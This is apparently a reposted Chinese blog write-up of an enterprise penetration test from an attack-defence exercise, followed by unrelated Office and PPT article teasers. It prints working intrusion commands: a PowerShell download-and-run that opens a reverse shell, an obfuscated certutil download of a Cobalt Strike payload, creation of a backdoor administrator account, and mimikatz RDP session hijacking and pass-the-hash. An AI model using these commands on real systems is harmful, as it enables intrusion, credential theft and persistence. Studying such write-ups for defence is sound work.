百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 软件资讯 > 正文

记一次对某企业的渗透测试

ninehua 2025-03-01 14:57 28 浏览

免责声明

由于传播、利用本头条俊杰说黑客所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,俊杰说黑客不为承担任何责任,一旦造成后果请自行承担!

前言

某次攻防演练中,主办方只提供了目标企业名称,其他信息都需要自己收集,这篇文章记录一下渗透过程。

信息收集

既然只有目标名称,name首先根据提供的名称去查询下备案域名。一般常用的就是工信部ICP/IP地址/域名信息备案管理系统

https://beian.miit.gov.cn/

是比较精准了,但是每次查询都要点击验证码,对于我这种懒人来说还是感觉比较麻烦~ 个人使用次数比较多的是

https://www.beianx.cn/

这个网站优点就是很少触发验证码识别,缺点可能信息更新不及时/不全面,跟前一个网站可以配合着用 查询到目标备案域名后,可以在fofa、hunter上进行信息收集,或者使用谷歌语法

site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

在对主站及子域进行相关测试后,并没有发现可以利用的点;使用nmap对子域IP进行全端口探测,发现如下信息系统:

SQL注入上线CS

使用burp爆破弱口令未果;遂尝试SQL注入,发现漏洞存在且为DBA权限

直接os-shell,但是看不到回显

sqlmap.py -r 1.txt --os-shell

可以通dnslog,但是尝试powershell上线失败

通过powershell反弹cmd

  • ? powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。被攻击端运行命令
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c **** -p **** -e cmd

攻击端用nc监听即可反弹出cmd。

然后使用certutil下载cs上线程序,然后执行上线。certutil是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。但是该命令的使用会引发杀毒软件的查杀,所以在实际渗透中需要将该命令做一定的免杀处理,比如

c""""e""""r""""t""""u""""t""""i""""l.exe -urlcache -split -f http://ip/6666.exe 6666.exe

提权&&内网横向

当前用户是SqlServer权限,不利于下一步的内网横向,所以要先提权,执行systeminfo可知当前为server2012系统。当前可以考虑使用BadPotato提权(提权脚本见知识星球)

当前被控机已提权至system权限,一般我们可以在CS上注入一个进程简单做一下权限维持 在CS客户端会话上

邮件-Explore-Process List-在加载出的系统进程中选择一个常见程序-下方选择Inject

至此系统提权和权限维持已完成,因为是server2012 R2版本,也没有啥比较好的办法去读密码,个人一般选择加用户或者激活guest然后搭代理登3389。添加用户:

net user aaa 123qwe... /add

这就添加了一个用户为:aaa密码为:123qwe...的用户了 第二步 将此用户提升为管理员:

net localgroup administrators aaa /add

管理员账户已经添加完成,看看受控机是否启用远程桌面连接

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

0x1表示关闭;0x0表示开启

查一下远桌面服务开在了哪个端口

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

之后再通过计算器来将16进制转10进制即可:

现在该有的权限、管理员账号、3389都具备了,用frp或者nps搭个代理就可以连接内网服务器了。但是还没有拿下服务器的管理员桌面,可以考虑使用rdp劫持

privilege::debug #提权 
ts::sessions #查看当前主机的会话
token::elevate #提升本地管理员权限为system 
ts::remote /id:2 #劫持id为2的会话

或者

privilege::debug 
sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

(手头上没有合适的机器复现了,暂且找了张图凑合看吧,图文无关~)

现在管理员桌面也搞定了,然后直接上Tscan扫内网,等待的时间可以翻翻mstsc连接记录、浏览器历史记录和记住的账号密码。这个内网资产还可以,毕竟是大企业内网而且防护相对比较薄弱,刚好Tscan的POC比较多,比较适合刷分。这里就不再一一放图了~

#头条文章发文任务# #网络安全#?#安全漏洞#?

相关推荐

有哪些免费的PPT模板下载网站(有哪些免费ppt模板下载网址)

不管是工作介绍还是汇报,总结和计划,一旦说道要对工作来一个现场的展示,总是离不开ppt的。要说到没费的PPT模板首先想到的就是PPT宝藏,网如其名;其他还有很多网站大多数会提供部分的免费模板。下面介绍...

产品更新|PPT美化三部曲,微软OfficePLUS PPT插件帮你搞定

正所谓,意识决定成败!各位职场人们,想要从炫技型PPT选手蜕变成职场型PPT选手,你只需要一个了解职场需求的PPT插件。时隔一个月,微软OfficePLUSPPT插件带着新版本功能强势归来了!话不多...

关于officeLTSC 2021预览版与2021年1月17号到期重新新激活问题

最近打开Excel文件总会提醒officeLTSC2021预览版与2021年1月17号到期如下图:提示很吓人,如果不按照文件操作就意味着使用Excel只能只读不能编辑了。在网上查找资料,使用各种激活...

知道这8个PPT模板网站,答辩汇报永不发愁!

你还在为答辩PPT烦恼吗?最近,临近毕业答辩季,有很多学弟学妹给我发微信,说答辩PPT不知道该怎么做?是的,对大部分同学来说,在大学期间,毕业答辩可能是他第一次做PPT。可遇上如此重要的场...

办公软件office,用这个一键安装超简单

今天给大家分享的是一个office办公软件安装助手OfficeToolPlus,它集下载安装激活卸载修复为一体,解决office安装激活的各种难题需要安装office就点部署按钮,然后...

约吗?我这里有5个免费的PPT模板网址,赶紧码住

咳咳,来了家人们。今天继续搬出小仓库,给大家说说PPT模板,俺也是经历过找模板的痛苦,还花钱买过,说起来都是辛酸史了。那能免费白嫖为啥还要付费呢,说的是不是很有道理(我也是这么觉得,咳咳....)。今...

8款办公软件推荐,每一款都是精品!

当代办公室的工作方式已经发生了翻天覆地的变化。在过去,办公室工作主要依赖于纸质文件和传统的脱机沟通方式。然而,随着科技的飞速发展,数字化办公软件正在成为现代职场的标配。这些软件不仅使得工作更加高效和便...

实用网站推荐——office模板(PPT)

今天给大家分享一批Office的模板网站!office模板比较多的是PPT模板,做PPT是一件非常痛苦的事,自己做的要么太丑,要么搭配太单一,所以今天给大家分享一批网站,再也不用愁做PPT了。word...

1、Office Tool Plus工具部署与激活Office等软件

1、搜索并下载OfficeToolPlus工具,并将下载好的工具解压至相应的位置,尽量下载最新版本,新版本的支持性与兼容性更好2、双击打开OfficeToolPlus3、许可协议这里选择“是”...

Office Tool Plus,一个强大且实用的 Office 部署工具

OfficeToolPlus基于Office部署工具和OSPP制作,可以很方便的部署Office,其内置迅雷引擎可帮助您更快地下载Office,当然,你也可以使用OfficeT...

Windows 最稳定最流畅的官方版本,极限精简,3年更新一次

每次小淙发Windows的文章,就有人会吐槽Windows辣鸡,不稳定,bug多,虽然这些问题我都没遇到过,但我不相信电手的粉丝们是不会用电脑的,一定有什么不可抗力因素,一定是微软的问题。对...

自己轻松一键安装Office 2024专业版,详细操作教程

阅读前点个「关注」,获取每日精彩内容微软发布了Office2024版本,这个版本真的很强大。不但产品功能强大,而且体验流畅而丝滑。LTSC企业长期服务版建议选择:LTSC企业长期服务版,LTSC是公...

如何安装windows11和office2021并成功激活(二)

话接上回安装完毕windows11以后,点击officeToolPlus点击部署选择不是设置选择对应部署的office套件,小编选择LTSC2021专业增强版本,其他同学根据情况而定,如果不知道...

强烈安利6个设计必备网站,附赠精美毕业答辩模板

点击蓝字关注今天给大家推荐6个设计必备的网站,内容涵盖PPT、海报、图片编辑、思维导图设计等方面,话不多说,上干货!1OfficePlus-微软官方的免费模板传送门:www.officeplus.c...

微软Office离线部署工具Office Tool Plus

OfficeToolPlus(OTP)是用于MicrosoftOffice的便捷实用的脱机部署工具,基于Office部署工具。主要功能是帮助用户轻松下载和安装MicrosoftOffice。O...